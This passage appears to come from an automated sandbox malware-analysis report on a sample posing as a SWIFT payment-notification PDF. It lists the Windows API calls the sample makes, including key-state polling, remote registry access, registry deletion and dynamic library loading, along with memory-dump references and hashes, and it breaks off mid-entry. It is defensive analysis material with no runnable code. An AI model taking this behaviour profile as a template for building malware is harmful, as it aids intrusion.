                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                                                              • String ID: %lu$\VH
                                                                                                                              • API String ID: 2507767853-2432546070
                                                                                                                              • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                              • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                              • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                              • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                              • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                              • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                              • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3488606520-0
                                                                                                                              • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                                                                              • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                              • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                                                                                              • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                              APIs
                                                                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastselect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 215497628-0
                                                                                                                              • Opcode ID: 006f58dbe81cc522536b67ff6fac784aa7569fd7791981cb5739f3acd4829b9b
                                                                                                                              • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                              • Opcode Fuzzy Hash: 006f58dbe81cc522536b67ff6fac784aa7569fd7791981cb5739f3acd4829b9b
                                                                                                                              • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                              APIs
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ConnectRegistry
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 76216097-0
                                                                                                                              • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                              • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                              • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                              • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                              APIs
                                                                                                                              • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2449869053-0
                                                                                                                              • Opcode ID: edca6472ef0d27ee7e2f9b628ab7156cf8e4f7811a7febfc4905c6c59bc609c9
                                                                                                                              • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                              • Opcode Fuzzy Hash: edca6472ef0d27ee7e2f9b628ab7156cf8e4f7811a7febfc4905c6c59bc609c9
                                                                                                                              • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                              APIs
                                                                                                                              • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                              • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                              • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3539004672-0
                                                                                                                              • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                              • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                              • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                              • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                              APIs
                                                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 327565842-0
                                                                                                                              • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                              • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                              • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                              • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                              APIs
                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2832842796-0
                                                                                                                              • Opcode ID: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                                                                                              • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                              • Opcode Fuzzy Hash: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                                                                                              • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                              APIs
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Enum$CloseDeleteOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2095303065-0
                                                                                                                              • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                              • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                              • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                              • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: RectWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 861336768-0
                                                                                                                              • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                              • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                              • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                              • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                              APIs
                                                                                                                              • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                              • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                              • TrackPopupMenuEx.USER32(03316400,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CursorMenuPopupTrack$Proc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1300944170-0
                                                                                                                              • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                              • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                              • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                              • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                              APIs
                                                                                                                              • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                              • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                              • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1822080540-0
                                                                                                                              • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                              • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                              • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                              • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                              • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 659298297-0
                                                                                                                              • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
